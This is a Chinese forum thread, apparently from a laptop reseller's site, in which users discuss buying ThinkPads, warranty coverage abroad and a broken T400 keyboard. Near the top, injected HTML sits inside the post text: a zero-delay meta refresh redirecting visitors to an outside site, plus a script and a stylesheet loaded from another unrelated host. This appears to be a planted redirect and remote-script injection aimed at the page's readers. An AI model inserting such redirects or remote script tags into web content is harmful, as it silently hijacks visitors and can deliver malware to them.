开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

该不该出手呢,同志们

该不该出手呢,同志们

该不该出手呢,同志们

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

回复 simo 的帖子

可惜买不到小三啊,可遇不可求。自己这台翔意的T400键盘失灵了,想换个,可惜远在德国,不能享受到水货的实惠啊。
算下来6400,和在翔意价格差不多

您的T400机器在德国可以保修呀
回复 EddieFan 的帖子

对啊,我就是看到这一点,自己想想既然买不到水货,买一个和水货价格差不多的也行啊,结果就找到这个了,学生机。我09年4月买的 T400 2767CTO,应该过保了吧,也没多大的事,就是x键不能用,我把左边的alt键拔了,然后把x帽子给盖上去,改了键盘设置,将就着用,只是不爽啊。买电脑是多么开心的事,而且又有借口了,呵呵
3年保修的机器,没过保。
小三??
矮油 德国 很遥远的说……

啊,那不错,我以为我买的这个T400只有1年保(当时自己比较抠买了最便宜的),谢谢啦
roydsboy 发表于 2011-5-30 22:38

啊,那不错,我以为我买的这个T400只有1年保(当时自己比较抠买了最便宜的),谢谢 ...

你用序列号查一下就知道了http://www-307.ibm.com/pc/suppor ... ocid=LOOK-WARNTY#sw
有的时候有延迟~~~

谢谢老大啊。我查了 2012-03-24到期, INDONESIA的机子原来。
roydsboy 发表于 2011-5-30 22:43

谢谢老大啊。我查了 2012-03-24到期, INDONESIA的机子原来。 ...

那就可以拿到德国联想免费换键盘,风扇不好的话也可以一起换了,呵呵呵
该出手时就出手啊

查了半天,我这个城市,修电脑的和我准备要买这个x220i的是同一个公司,在学校边上,哎,我这一去送修,看到那么多小黑,不知道还能不能憋住不买啊,呵呵。儿童节愉快啊,同志们
roydsboy 发表于 2011-5-30 23:18

查了半天,我这个城市,修电脑的和我准备要买这个x220i的是同一个公司,在学校边上 ...

儿童节快乐,呵呵呵
学习,混币
尊的是有点遥远了
汇6000德国马克或欧元给翔意,机器就给您邮过去了。
回复 五指山 的帖子

汗,海运很慢很贵的。
儿童节快乐,呵呵
看来买水货还是国内买合适啊
五指山 发表于 2011-5-31 15:17
汇6000德国马克或欧元给翔意,机器就给您邮过去了。

大哥,马克好像没了吧,6000欧元这也太多了。我算算,再过1年,等这个T400保修过了,我算是省下了3年的德中往返机票(姑且算3次往返),估计可以买个在翔意买个好的机子了。
回复 roydsboy 的帖子

以后连欧元也没了,还不赶紧把它花掉。
以后就是人民币的天下了,全世界人民都是用人民币,美元、欧元、日元、韩元、卢布、荷兰盾、泰国铢………………全都要用作热电厂的原料。
逗着玩的哈,别当真了。
tonniguo 发表于 2011-5-31 15:21
回复 五指山 的帖子

汗,海运很慢很贵的。

海运才叫水货,空运叫啥子合适?
遥远的传说!